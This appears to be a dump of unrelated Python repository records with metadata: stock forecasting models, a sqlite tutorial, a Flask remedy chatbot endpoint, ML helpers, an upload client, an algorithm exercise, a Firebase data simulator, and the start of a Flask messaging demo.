particular day the market is open.\n\n :param datetime.datetime day: The day to verify if the marke is open.\n :return: True if the marke is open of False otherwise.\n :rtype: bool\n \"\"\"\n day_of_week = day.weekday()\n if day_of_week == 5 or day_of_week == 6 or day in self.market_holidays:\n return False\n else:\n return True\n\n\n def get_trading_days_in_range(self, start_date, end_date):\n \"\"\"\n Getting the trading days existing in a date range.\n\n :param datetime.datetime from_date: The starting date of the range.\n :param datetime.datetime to_date: The ending date of the range.\n :return: A list of the trading days in the specified date range.\n :rtype: list[datetime.datetime]\n \"\"\"\n trading_days = []\n\n current_day = start_date\n while (current_day <= end_date):\n if self.__is_trading_day(current_day):\n trading_days.append(current_day)\n current_day += datetime.timedelta(days=1)\n\n return trading_days\n\n\n def get_trading_days_after(self, date, num_trading_days):\n \"\"\"\n Getting a specific number of trading days after a given date.\n\n :param datetime.datetime date: The date after which training days are going to be retrieved.\n :param int num_trading_days: The number of training days to get.\n :return: A list containing the trading days.\n :rtype: list[datetime.datetime]\n \"\"\"\n trading_days = []\n\n current_day = date\n while (len(trading_days) < num_trading_days):\n current_day += datetime.timedelta(days=1)\n if self.__is_trading_day(current_day):\n trading_days.append(current_day)\n\n return trading_days\n\n\n\n#--------------------------------------\n# Machine Learning Models\n#--------------------------------------\n\nclass StockForecasterModel:\n \"\"\"\n This is a super-class to represent ML models/methods to perform predictions\n for the stock closing price for a particular company.\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n self.short_name = None\n self.long_name = None\n\n self.ticker_symbol = ticker_symbol\n\n self.training_start = None\n self.training_end = None\n\n if trading_days_helper is None:\n self.trading_days_helper = TradingDaysHelper()\n else:\n self.trading_days_helper = trading_days_helper\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The dataset used to extract the training set\n in accordance with the date range. \n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n raise NotImplementedError('Please Implement this method.')\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: The dataset used to support the prediction,\n in case that the model supports that.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n raise NotImplementedError('Please Implement this method.')\n\n\n @staticmethod\n def loadFromFile(file_name):\n \"\"\"\n Loads the model from a file.\n\n :param str file_name: The name of the file to load the model from. \n \"\"\"\n with open(file_name, 'rb') as fp:\n return pickle.load(fp)\n\n\n def saveToFile(self, file_name=None):\n \"\"\"\n Saves the current model to a file.\n\n :param file_name: The name of the file to save the model,\n if None the data is saved to a file in the 'data' directory\n using a name of the form 'model_name_ticker_yyyymmdd-yyyymmdd.pkl'\n with the minimum and maximum dates used for training. \n :type file_name: str or None\n :return: The name of the file used to store the model.\n :rtype: str\n \"\"\"\n if file_name is None:\n file_name = os.path.join(\n 'data',\n 'model_{}_{}_{:%Y%m%d}-{:%Y%m%d}.pkl'.format(\n self.short_name, self.ticker_symbol, self.training_start, self.training_end))\n\n with open(file_name, 'wb') as fp:\n pickle.dump(self, fp)\n\n return file_name\n\n\nclass LinearRegressionStockForecaster(StockForecasterModel):\n \"\"\"\n This represents a stock forecaster model based on linear regression.\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n StockForecasterModel.__init__(self, ticker_symbol, trading_days_helper=trading_days_helper)\n self.short_name = 'LinearRegression'\n self.long_name = 'Linear Regression'\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The dataset used to extract the training set\n in accordance with the date range. \n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n if start_date is not None and end_date is not None and start_date > end_date:\n raise ValueError('Invalid training date range.')\n\n training_set = base_dataset.getDataframe(ticker_symbol=self.ticker_symbol,\n from_date=start_date, to_date=end_date)\n\n self.training_start = min(training_set.date)\n self.training_end = max(training_set.date)\n\n # Pre-Processing\n # Only the timestamp (which is a numeric value) is considered as predictor,\n # since the linear regresion does not support datetimes\n add_timestamp_to_dataframe(training_set)\n x = training_set[['timestamp']]\n y = training_set.close\n\n self.model = LinearRegression()\n self.model.fit(x, y)\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: This is not supported for this model.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n if from_date is None:\n raise ValueError('Invalid initial date.')\n if to_date is None:\n to_date = from_date\n if from_date > to_date:\n raise ValueError('Invalid date range to predict.')\n\n if base_dataset is not None:\n warnings.warn(\"Prediction using a base dataset is not supported.\")\n\n # Getting the trading days in the predicting date range\n days_to_predict = self.trading_days_helper.get_trading_days_in_range(from_date, to_date)\n x_train = datetime_array_to_dataframe(days_to_predict)\n\n # Pre-Processing\n # Only the timestamp (which is a numeric value) is considered as predictor,\n # since the linear regresion does not support datetimes\n add_timestamp_to_dataframe(x_train)\n x_train = x_train[['timestamp']]\n\n y = self.model.predict(x_train)\n \n return pd.DataFrame({'symbol': self.ticker_symbol,\n 'date': days_to_predict,\n 'predicted_price': y})\n\n\nclass ArimaStockForecaster(StockForecasterModel):\n \"\"\"\n This represents a stock forecaster model based on Arima.\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n StockForecasterModel.__init__(self, ticker_symbol, trading_days_helper=trading_days_helper)\n self.short_name = 'Arima'\n self.long_name = 'Arima'\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The dataset used to extract the training set\n in accordance with the date range. \n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n if start_date is not None and end_date is not None and start_date > end_date:\n raise ValueError('Invalid training date range')\n\n training_set = base_dataset.getDataframe(ticker_symbol=self.ticker_symbol,\n from_date=start_date, to_date=end_date)\n self.training_start = min(training_set.date)\n self.training_end = max(training_set.date)\n\n # Pre-Processing\n # ARIMA only receives as sequence of value in the training,\n # then only the sequence of closing prices is needed\n training_set = training_set.close\n\n self.model = auto_arima(training_set,\n start_p=1, start_q=1, max_p=3, max_q=3, m=12, start_P=0,\n seasonal=True, d=1, D=1, trace=True,\n error_action='ignore', suppress_warnings=True)\n self.model.fit(training_set)\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: This is not supported for this model.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n if from_date is None:\n raise ValueError('Invalid initial date')\n if to_date is None:\n to_date = from_date\n if from_date > to_date:\n raise ValueError('Invalid date range to predict')\n if from_date <= self.training_end:\n raise ValueError('Date range to predict should be after last date used for training')\n\n if base_dataset is not None:\n warnings.warn(\"Prediction using a base dataset is not supported.\")\n\n # Getting the trading days to predict, including some gaps between the end of the training\n # and the begining of the prediction range\n prediction_start = self.training_end + datetime.timedelta(days=1)\n days_to_predict = self.trading_days_helper.get_trading_days_in_range(prediction_start, to_date)\n\n # Pre-Processing\n # For ARIMA only the number of future points to predict is required,\n # then only the number of trading days to predict need to be calculated\n y = self.model.predict(n_periods=len(days_to_predict))\n \n return pd.DataFrame({'symbol': self.ticker_symbol,\n 'date': days_to_predict,\n 'predicted_price': y}\n )\\\n .query(\"date >= '{}' and date <= '{}'\".format(from_date, to_date))\n # Filtering to get just the days in the given prediction range\n\n\nclass ProphetStockForecaster(StockForecasterModel):\n \"\"\"\n This represents a stock forecaster model based on Facebook's Prophet.\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n StockForecasterModel.__init__(self, ticker_symbol, trading_days_helper=trading_days_helper)\n self.short_name = 'Prophet'\n self.long_name = 'Prophet'\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The dataset used to extract the training set\n in accordance with the date range. \n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n if start_date is not None and end_date is not None and start_date > end_date:\n raise ValueError('Invalid training date range')\n\n self.training_set = base_dataset.getDataframe(ticker_symbol=self.ticker_symbol,\n from_date=start_date, to_date=end_date)\n self.training_start = min(self.training_set.date)\n self.training_end = max(self.training_set.date)\n\n # Pre-Processing\n # Prophet takes the dates as predictors in a column called 'ds',\n # and the outcomes in a column called 'y',\n # then the columns 'date' needs to be renamed as 'ds', and 'close' as 'y'\n self.training_set = pd.DataFrame(self.training_set, columns=['date', 'close'])\n self.training_set.rename(columns={'close': 'y', 'date': 'ds'}, inplace=True)\n\n self.model = Prophet(daily_seasonality=True)\n self.model.fit(self.training_set)\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: This is not supported for this model.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n if from_date is None:\n raise ValueError('Invalid initial date')\n if to_date is None:\n to_date = from_date\n if from_date > to_date:\n raise ValueError('Invalid date range to predict')\n if from_date <= self.training_end:\n raise ValueError('Date range to predict should be after last date used for training')\n\n if base_dataset is not None:\n warnings.warn(\"Prediction using a base dataset is not supported.\")\n\n # Getting the trading days to predict, including some gaps between the end of the training\n # and the begining of the prediction range\n prediction_start = self.training_end + datetime.timedelta(days=1) \n days_to_predict = self.trading_days_helper.get_trading_days_in_range(prediction_start, to_date)\n\n # Pre-Processing\n # For Prophet only the number of future points to predict is required,\n # then only the number of trading days to predict need to be calculated\n x = self.model.make_future_dataframe(periods=len(days_to_predict))\n\n y = self.model.predict(x)['yhat'][self.training_set.shape[0]:]\n\n return pd.DataFrame({'symbol': self.ticker_symbol,\n 'date': days_to_predict,\n 'predicted_price': y})\\\n .query(\"date >= '{}' and date <= '{}'\".format(from_date, to_date))\n # Filtering to get just the days in the given prediction range\n\n\nclass LongShortTermMemoryStockForecaster(StockForecasterModel):\n \"\"\"\n This represents a stock forecaster model based Long Short Term Memory\n (with Recurrent Neural Networks).\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None, timesteps=60, training_epocs=2):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n StockForecasterModel.__init__(self, ticker_symbol, trading_days_helper=trading_days_helper)\n self.short_name = 'LSTM'\n self.long_name = 'Long Short Term Memory'\n self.scaler = MinMaxScaler(feature_range=(0, 1))\n self.timesteps = timesteps\n self.training_epocs = training_epocs\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The dataset used to extract the training set\n in accordance with the date range. \n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n if start_date is not None and end_date is not None and start_date > end_date:\n raise ValueError('Invalid training date range')\n\n self.training_set = base_dataset.getDataframe(ticker_symbol=self.ticker_symbol,\n from_date=start_date, to_date=end_date)\n self.training_start = min(self.training_set.date)\n self.training_end = max(self.training_set.date)\n\n # Pre-Processing\n # LSTM takes as predictors sequences of a given length (time-steps) containing\n # consecutive values in a time sequence,\n # the outcome is the following value in the time sequence.\n # Also the values should be scaled to the range from 0 to 1.\n\n # The sequence of closing prices is needed as a dataframe\n self.training_set = pd.DataFrame(self.training_set, columns=['close'])\n # Scaling the closing prices to the range 0 to 1\n scaled_training_set = self.scaler.fit_transform(self.training_set)\n\n # Getting an array of sequences of size (self.timesteps) of consecutive closing prices\n # and an array with the outcomes\n x_train, y_train = [], []\n for i in range(self.timesteps, len(scaled_training_set)):\n x_train.append(scaled_training_set[i - self.timesteps : i, 0])\n y_train.append(scaled_training_set[i, 0])\n x_train, y_train = np.array(x_train), np.array(y_train)\n\n # Re-shaping the input to feed the LSTM network\n x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n\n # Creating and fitting the LSTM network\n self.model = Sequential()\n self.model.add(LSTM(units=50, return_sequences=True, input_shape=(x_train.shape[1], 1)))\n self.model.add(LSTM(units=50))\n self.model.add(Dense(1))\n\n self.model.compile(loss='mean_squared_error', optimizer='adam')\n self.model.fit(x_train, y_train, epochs=self.training_epocs, batch_size=1, verbose=2)\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: The dataset used to support the prediction.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n if from_date is None:\n raise ValueError('Invalid initial date')\n if to_date is None:\n to_date = from_date\n if from_date > to_date:\n raise ValueError('Invalid date range to predict')\n if from_date <= self.training_end:\n raise ValueError('Date range to predict should be after last date used for training')\n\n # Getting the trading days to predict, including some gaps between the end of the training\n # and the begining of the prediction range\n prediction_start = self.training_end + datetime.timedelta(days=1) \n days_to_predict = self.trading_days_helper.get_trading_days_in_range(prediction_start, to_date)\n\n # If a base (updated) dataset is used taking the previous values from there,\n # otherwise taking them from the training set\n if base_dataset is not None:\n inputs = base_dataset.dataframe.query(\n \"symbol == '{}' and date <= '{}'\"\\\n .format(self.ticker_symbol, self.training_end))\\\n .close.values\n else:\n inputs = self.training_set.close.values\n\n # The array 'inputs' contains the closing prices in the time sequence,\n # it is initially loaded with self.timesteps elements which\n # last element corresponds to the date when the training ended. \n inputs = inputs[len(inputs) - self.timesteps:]\n inputs = inputs.reshape(-1,1)\n inputs = self.scaler.transform(inputs).reshape(-1)\n\n y = []\n\n for i in range(0, len(days_to_predict)):\n # Taking the next sequence of size self.timesteps of closing prices from 'inputs'\n x = np.array(inputs[i : i + self.timesteps])\n # Re-shaping to be used by the LSTM as input\n x = np.reshape(x, (1, self.timesteps, 1))\n\n # Predicting the next value in the time sequence (it needs to be scaled back)\n pred = self.model.predict(x)\n y.append(self.scaler.inverse_transform(pred).reshape(-1)[0])\n\n # If a base (updated) dataset is used taking the following value in the time sequence\n # from there if it exists (it should be scaled), otherwise taking the predicted value. \n existing_rec = base_dataset.dataframe.query(\n \"date == '{}' and symbol == '{}'\".format(days_to_predict[i], self.ticker_symbol)) \\\n if base_dataset is not None else None\n if existing_rec is not None and len(existing_rec) > 0:\n inputs = np.append(\n inputs, self.scaler.transform(existing_rec.close.values.reshape(-1,1)).reshape(-1)[0])\n else:\n inputs = np.append(inputs, pred)\n\n return pd.DataFrame({'symbol': self.ticker_symbol,\n 'date': days_to_predict,\n 'predicted_price': y})\\\n .query(\"date >= '{}' and date <= '{}'\".format(from_date, to_date))\n # Filtering to get just the days in the given prediction range","repo_name":"egar-garcia/machine-learning-engineer-nanodegree-capstone","sub_path":"djia_stock_prediction.py","file_name":"djia_stock_prediction.py","file_ext":"py","file_size_in_byte":37783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17146733189","text":"import sqlite3\n\n# Si la bdd n'existe pas il va la créer\ncnx = sqlite3.connect(\"formation.db\")\ncurseur = cnx.cursor() # permet d'executer des requetes sur la BDD\n\n#Cretion d'un tableau dans la BDD\ncurseur.execute(\"CREATE TABLE IF NOT EXISTS employe (nom TEXT, prenom TEXT)\")\n\n# Inserer un employé dans la BDD\n# curseur.execute(\"INSERT INTO employe (nom, prenom) VALUES ('Doe', 'John')\")\n\n# Deuxième méthode insertion via un dictionnaire\nemploye_variable = {\n 'lastname' : \"Zarella\",\n 'firstname' : \"Maude\" # on pourrait également le passer sous forme de viriable suite à la saisie de l'utlisateur par exmeple\n}\n#curseur.execute(\"INSERT INTO employe (nom, prenom) VALUES (:lastname, :firstname)\", employe_variable)\n\n# methode insertion avec tuple\nemploye_tuple= ('Hochet', 'Rick')\ncurseur.execute(\"INSERT INTO employe (nom, prenom) VALUES (? , ?)\", employe_tuple)\n\n# Lorque lon modifie les colones d'un tableau en BDD il faut sauvengarder les changements\ncnx.commit()\n\ncnx.close()\n","repo_name":"gdpe404/formation_avancee_python","sub_path":"02-bdd/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15873704230","text":"import os\nimport pymongo\nfrom flask_restful import Resource, reqparse\nfrom langchain.embeddings.huggingface import HuggingFaceEmbeddings\nfrom llama_index import (\n LangchainEmbedding,\n ServiceContext,\n StorageContext,\n load_index_from_storage,\n set_global_service_context,\n)\nfrom llama_index.memory import ChatMemoryBuffer\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"False\"\nos.environ[\"OPENAI_API_KEY\"] = os.getenv(\"FLASK_OPENAI_API_KEY\")\n\ntry:\n client = pymongo.MongoClient(os.getenv(\"FLASK_MONGODB_URI\"))\n db = client[\"hackathon\"]\n print(\"Connected to the dev database successfully.\")\nexcept pymongo.errors.ConnectionFailure as e:\n print(\"Failed to connect to the dev database: %s\", e)\n\nmedicineRef = db[\"medicine\"]\n\nmodel = LangchainEmbedding(HuggingFaceEmbeddings(model_name='sentence-transformers/all-MiniLM-L6-v2'))\nservice_context = ServiceContext.from_defaults(embed_model=model)\nset_global_service_context(service_context)\n\nstorage_context = StorageContext.from_defaults(persist_dir=\"./AI/disease_remedy_index\")\nmedical_index = load_index_from_storage(storage_context)\n\nmemory = ChatMemoryBuffer.from_defaults(token_limit=1500)\n\nayurvedic_remedy_engine = medical_index.as_chat_engine(\n chat_mode=\"context\",\n memory=memory,\n system_prompt=\"\"\"\n Act as an ayurvedic doctor suggesting ayurvedic remedies for disease. \n I will provide you disease name, you should provide me ayurvedic remedies for that disease in brief.\n \"\"\" ,\n)\n\nclass AyurvedicRemedies(Resource):\n\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument(\"disease\", type=str, required=True, help=\"disease is required\")\n\n args = parser.parse_args()\n disease = args[\"disease\"]\n data = {\n \"disease\": disease,\n \"remedy\": getAyurvedicRemedies(disease)\n }\n\n return {\"error\": False, \"data\": data}, 200\n\n\ndef getAyurvedicRemedies(disease):\n try:\n response = ayurvedic_remedy_engine.chat(disease)\n return response.response\n except Exception as e:\n return {\"error\": True, \"message\": str(e)}, 500\n","repo_name":"jhenilparihar/AyuCare","sub_path":"backend/resources/remedies.py","file_name":"remedies.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30886545627","text":"import functools\nimport gc\nimport multiprocessing as mp\nimport os\nfrom typing import Any, Callable, Dict, List, NoReturn, Tuple\n\nimport hydra\nimport joblib as jl\nimport numpy as np\nimport omegaconf\n\n\ndef make_path(dataset_params: Dict[str, str]) -> str:\n if not (\"path\" in dataset_params or \"file\" in dataset_params):\n raise KeyError(\"`dataset_params` does not contain the information necessary.\")\n\n return os.path.join(dataset_params[\"path\"], dataset_params[\"file\"])\n\n\ndef load_metadata(folders: List[str], files: List[str]) -> Dict[str, Any]:\n overides_ = [f\"+{a}={b}\" for a, b in zip(folders, files)]\n\n with hydra.initialize_config_module(config_module=\"conf\"):\n metadata = hydra.compose(overrides=overides_)\n\n return omegaconf.OmegaConf.to_object(metadata)\n\n\ndef load_dataset_params(dataset: str):\n return load_metadata([\"data\"], [dataset])[\"data\"]\n\n\ndef execute_in_multplipe_processes(\n functions: List[Callable[[Any], Any]], fn_args: List[Tuple[Any]]\n) -> NoReturn:\n\n spawned_processes = []\n\n if fn_args is None:\n args = [tuple()] * len(functions)\n else:\n if len(functions) != len(fn_args):\n raise ValueError(\n \"List of arguments and list of functions have unmatching lengths.\"\n )\n\n for fn, args in zip(functions, fn_args):\n process = mp.Process(target=fn, args=args)\n process.start()\n spawned_processes.append(process)\n\n _ = map(lambda p: p.join(), spawned_processes)\n\n\ndef run_in_parallel(\n function: Callable[[Any], Any],\n values: List[Any],\n backend: str = \"loky\",\n n_jobs: int = 4,\n verbose: int = 2,\n) -> List[Any]:\n results = jl.Parallel(n_jobs=n_jobs, backend=backend, verbose=verbose)(\n jl.delayed(function)(x) for x in values\n )\n\n gc.collect()\n return results\n\n\ndef log_execution_start(fn):\n @functools.wraps(fn)\n def wrapper(*args, **kwargs):\n print(f\"Started execution of `{fn.__name__}`\")\n return fn(*args, **kwargs)\n\n return wrapper\n\n\ndef _compute_one_dimension_size(\n input_dim_size: int, filter_dim_size: int, stride: int, padding: int\n) -> int:\n return np.floor(\n ((input_dim_size + 2 * padding - filter_dim_size) / stride) + 1\n ).astype(np.int32)\n\n\ndef _same_convolution_padding(filter_shape: Tuple[int, int]) -> Tuple[int, int]:\n filter_height, filter_width = filter_shape\n same_padding_height, same_padding_width = (\n (filter_height - 1) / 2,\n (filter_width - 1) / 2,\n )\n return same_padding_height, same_padding_width\n\n\ndef convolution_output_dimension(\n input_shape: Tuple[int, int],\n filter_shape: Tuple[int, int],\n stride: Tuple[int, int],\n padding: Tuple[int, int],\n num_filters: int,\n) -> Tuple[int, int, int]:\n input_height, input_width = input_shape\n filter_height, filter_width = filter_shape\n stride_height, stride_width = stride\n padding_height, padding_with = padding\n\n output_height = _compute_one_dimension_size(\n input_height, filter_height, stride_height, padding_height\n )\n\n output_width = _compute_one_dimension_size(\n input_width, filter_width, stride_width, padding_with\n )\n\n return (output_height, output_width, num_filters)\n","repo_name":"statsgustavo/facial-keypoints-detection","sub_path":"src/facial_keypoints_detection/tools/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13185923394","text":"from .base import MljarHttpClient\nfrom ..model.dataset import Dataset\nfrom ..exceptions import FileUploadException\n\nfrom ..log import logger\n\nclass DataUploadClient(MljarHttpClient):\n '''\n Client to upload data into MLJAR.\n '''\n def __init__(self):\n self.url = \"/s3policy/\"\n super(DataUploadClient, self).__init__()\n\n def _get_signed_url(self, project_hid, file_path):\n data = {'project_hid':project_hid, 'fname': file_path.split('/')[-1]}\n response = self.request(\"POST\", self.url, data = data)\n return response.json()\n\n def upload_file(self, project_hid, file_path):\n logger.info('File upload started')\n url_data = self._get_signed_url(project_hid, file_path)\n signed_url = url_data['signed_url']\n dst_path = url_data['destination_path']\n with open(file_path, 'rb') as fin:\n response = self.request(\"PUT\", signed_url, data=fin.read(),\n with_header=False, url_outside_mljar=True,\n parse_json=False)\n if response.status_code != 200:\n raise FileUploadException('There was a problem with data upload into MLJAR')\n return dst_path\n","repo_name":"yutfut/TMO","sub_path":"Laba#6:курсовая/venv/lib/python3.9/site-packages/mljar/client/dataupload.py","file_name":"dataupload.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20332548693","text":"t = int(input())\nmax_sum= 0\n\nfor idx in range(1,t+1):\n n,m = map(int, input().split())\n tc = []\n for i in range(n):\n tc.append(list((map(int, input().split())))) #testcase 입력 끝\n\n for i in range(n-m+1):\n for j in range(n-m+1):\n sum = 0\n for k in range(m):\n for l in range(m):\n sum+= tc[i+k][j+l]\n if sum>max_sum:\n max_sum = sum\n\n print(f\"#{idx} {max_sum}\")\n max_sum = 0\n \n\n ","repo_name":"yeoneed/Algorithm_byme","sub_path":"SWEA/2001_파리_퇴치.py","file_name":"2001_파리_퇴치.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7700195628","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nfrom random import randint\n\ncred = credentials.Certificate(\"../credentials/rh.json\")\nfirebase_admin.initialize_app(cred)\n\nimport random\nimport time\n\ndef strTimeProp(start, end, format, prop):\n stime = time.mktime(time.strptime(start, format))\n etime = time.mktime(time.strptime(end, format))\n ptime = stime + prop * (etime - stime)\n return time.strftime(format, time.localtime(ptime))\n\n\ndef randomDate(start, end, prop):\n return strTimeProp(start, end, '%Y-%m-%d %I:%M %p', prop)\n\ndef generateData():\n data = {\n u'addedBy':u'4uaHJ1zzB9ZWiySnr610oD3oFat2',\n u'category':u'Inventory',\n u'cost':randint(50,60),\n u'date':u''+str(randomDate(\"2017-1-1 1:30 PM\", \"2018-1-1 4:50 AM\", random.random())),\n u'itemId':u'CPoMrmIlyHrKAb7xtejG',\n u'logId':u''+str(randint(1,1000)),\n u'logType':u'Added',\n u'quantity':randint(1,5),\n u'remarks':u'dsfvdsc',\n u'selectedColumns':u'Boys',\n u'subCategory':u'Assets'\n }\n return data\n\ndb = firestore.client()\n\nfor i in range(0,100):\n data = generateData()\n db.collection(u'logs').document(data['logId']).set(data)","repo_name":"DarshanGowda0/ML-Reaching-Hands","sub_path":"python-clients/simulate_data.py","file_name":"simulate_data.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72644851930","text":"from spots_detection import empty_spots_detection as d_spots\nimport numpy as np\nimport cv2\n\n\ndef get_available_spots(image,id):\n alpha = 0.5\n empty_spots=d_spots.detect_empty_spots(image,id)\n cp_image = np.copy(image)\n new_image = np.copy(image)\n amount=len(empty_spots[0])+len(empty_spots[1])+len(empty_spots[2])\n for i in range(len(empty_spots)):\n for box in empty_spots[i]:\n x1, y1, x2, y2 = box\n cv2.rectangle(cp_image, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), -1)\n cv2.addWeighted(cp_image, alpha, new_image, 1 - alpha, 0, new_image)\n cv2.putText(new_image, \"Total: %d\" % amount, (30, 125),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.7, (255, 255, 255), 2)\n return new_image","repo_name":"lacusver/parking_lot_detection","sub_path":"spots_detection/detection_on_frame.py","file_name":"detection_on_frame.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24715209595","text":"import typing as T\n\nimport flask\nimport markupsafe\n\n# pt1: add app, serve index\n# pt2: add \"messaging\" and \"user\"\n\napp = flask.Flask(__name__)\n\n\n# \"messaging\"\n\nusers = [\n \"a\",\n \"b\",\n]\n\ncreds = {\n \"a\": \"1234\",\n \"b\": \"1234\",\n}\n\nmessages = {\n \"a\": [\n {\n \"from\": \"b\",\n \"msg\": \"hey\",\n },\n ],\n \"b\": [\n {\n \"from\": \"a\",\n \"msg\": \"weird to write myself for a demo in front of an audience?\",\n },\n ],\n}\n\n\n# index\n\n\n@app.route(\"/\")\ndef index():\n msg = \"

    Hello, World!

